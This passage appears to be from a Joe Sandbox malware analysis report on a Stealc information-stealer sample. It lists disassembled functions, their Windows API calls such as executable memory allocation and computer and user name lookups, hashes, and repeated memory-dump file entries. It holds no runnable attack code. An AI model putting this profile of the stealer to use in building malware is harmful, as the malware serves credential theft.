Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: 75b13e4be59e39ae38cbe0be4dd4ddebc2fdb2e954387d999480a5e1a46f1117
Instruction ID: 6dfc9dec68a6b4163c3c1bac6d2347587bc078d1cbb89f42c7b1503cb91b75ad
Opcode Fuzzy Hash: 75b13e4be59e39ae38cbe0be4dd4ddebc2fdb2e954387d999480a5e1a46f1117
Instruction Fuzzy Hash: D6E10272910118ABDB14FBA1CCA2EEE733CBF54300F444169F546764A1EF356E49EBA2

Function 00CAAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

lstrlenA.KERNEL32(00000000), ref: 00CAB16A
lstrlenA.KERNEL32(00000000), ref: 00CAB17E

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 754a7acaf9823458d47c283b69b2477c4f5c91bfa2db6a0bcaeca91802ac620f
Instruction ID: b901bd6c4529cca763cc71deaa446a0d674d162aa9271cce152d15a404fd19e4
Opcode Fuzzy Hash: 754a7acaf9823458d47c283b69b2477c4f5c91bfa2db6a0bcaeca91802ac620f
Instruction Fuzzy Hash: C1913372910108ABDB14FBA1DCA6EEE733CAF54300F444169F547B7491EF356A09EBA2

Function 00CAB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

lstrlenA.KERNEL32(00000000), ref: 00CAB42E
lstrlenA.KERNEL32(00000000), ref: 00CAB442

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 42a122eb2d7e3328b1669a5553f61b3a37b76ff227e055eadaee3e346b4b0018
Instruction ID: a0d42c1f921714cc27880a331ef726559fce20ff9cf7fbf47441d56b1ac502de
Opcode Fuzzy Hash: 42a122eb2d7e3328b1669a5553f61b3a37b76ff227e055eadaee3e346b4b0018
Instruction Fuzzy Hash: 47711F71910118ABDB14FBA1DCA6EEE733CBF54300F444528F546B7492EF356A09EBA2

Function 00CA6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00CA6DBE,00CA6DBE,00003000,00000040), ref: 00CA6706
VirtualAlloc.KERNEL32(00000000,00CA6DBE,00003000,00000040), ref: 00CA6753

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ee4affaffacbb21ac4ffb04ecc98185d4b6cbf6654b6396e35453a26d600bec
Instruction ID: 36dd7073c9a23bf137e39f491d3cdf08d8071ce41db601c58ff6c833e655d3c0
Opcode Fuzzy Hash: 1ee4affaffacbb21ac4ffb04ecc98185d4b6cbf6654b6396e35453a26d600bec
Instruction Fuzzy Hash: 9041BF74A00209EFCB44CF58C494BADBBB1FF48318F1486A9E9599B355D731EA81CF84

Function 00CA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,00CA114E,?,?,00CB6A1C), ref: 00CA10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,00CA114E,?,?,00CB6A1C), ref: 00CA10F7

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8e09109fe562589089343e9d9ede4f7d0fcca9ece322763bf0b6afb5bd89ed49
Instruction ID: 66d8734102258660f9c718ee8e025cb43baf3f55f6d0ae033465c0e5d9488cbd
Opcode Fuzzy Hash: 8e09109fe562589089343e9d9ede4f7d0fcca9ece322763bf0b6afb5bd89ed49
Instruction Fuzzy Hash: 34F0E271641208BBEB149AA4AC89FAAB7ECE705B15F300458F904E7280D571AF04DAA4

Function 00CB8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00CB0117,?,00000000,?,00000000,00CC0DAB,00CC0DAA), ref: 00CB8D9F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 33882721074ffb3befbef90560442446957387642a7c55564b2bb394566cfac6
Instruction ID: 57c88e2d103dab11eed72eda8a0a87892e6b023e6821bdcc1402b0e85e7721e5
Opcode Fuzzy Hash: 33882721074ffb3befbef90560442446957387642a7c55564b2bb394566cfac6
Instruction Fuzzy Hash: 6FF0A570C0020CEBCB14EFA5D5596DCBB78EB10310F10819AE8666B2D0DB756B59EF81

Function 00CB8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 126bd9b51cb635db76fe6ac3492ada4288d34665be9d54c15f1d653ea0db6ef8
Instruction ID: 5f3e138e7f53e5170171cef45f573cb7dbd3fac2e233c2dc548e6f03d6f37065
Opcode Fuzzy Hash: 126bd9b51cb635db76fe6ac3492ada4288d34665be9d54c15f1d653ea0db6ef8
Instruction Fuzzy Hash: C4E01A31A4034C7BEB91EB90DC96FEE737C9B44B01F004295BA0C6B1C0DE70AB898B91

Function 00CA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB6A2B), ref: 00CB7910
Part of subcall function 00CB78E0: HeapAlloc.KERNEL32(00000000,?,?,?,00CB6A2B), ref: 00CB7917
Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F

Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
Part of subcall function 00CB7850: HeapAlloc.KERNEL32(00000000,?,?,?,00CA11B7), ref: 00CB7887
Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F

ExitProcess.KERNEL32 ref: 00CA11C6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 7f995b6a6487d8480b85d23c309df1d6b2c5ceba417d98092e4ed839b687b106
Instruction ID: afb2c5956693feb705cc37ce05d9f91c2a87c2b92087105e35ad931d69de52db
Opcode Fuzzy Hash: 7f995b6a6487d8480b85d23c309df1d6b2c5ceba417d98092e4ed839b687b106
Instruction Fuzzy Hash: ADE012B591430657CB0073B1AC4AB6B369C9B55389F0C053DFF09F6142FA25F909E566

Function 00CB8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

